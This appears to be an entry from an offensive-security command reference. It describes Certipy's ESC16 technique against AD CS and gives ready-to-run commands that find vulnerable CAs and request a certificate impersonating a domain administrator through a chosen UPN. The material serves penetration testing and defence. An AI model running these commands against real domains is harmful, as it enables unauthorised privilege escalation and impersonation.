Certipy ESC16 (CA Security Extension Disabled)

ESC16: the CA has the szOID_NTDS_CA_SECURITY_EXT object identifier in DisableExtensionList, so issued certificates omit the strong SID security extension entirely. Any template that lets you specify a SAN/UPN now permits impersonation regardless of strong-mapping enforcement. Detect with `certipy find -vulnerable`.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -template User -upn '<target>@<domain>'

Examples

certipy find -u jdoe@corp.local -p Password123! -dc-ip 10.10.10.10 -vulnerable -enabled
certipy req -u jdoe@corp.local -p Password123! -dc-ip 10.10.10.10 -ca CORP-CA -template User -upn administrator@corp.local

Tags

certipy adcs esc16 security-extension strong-mapping

References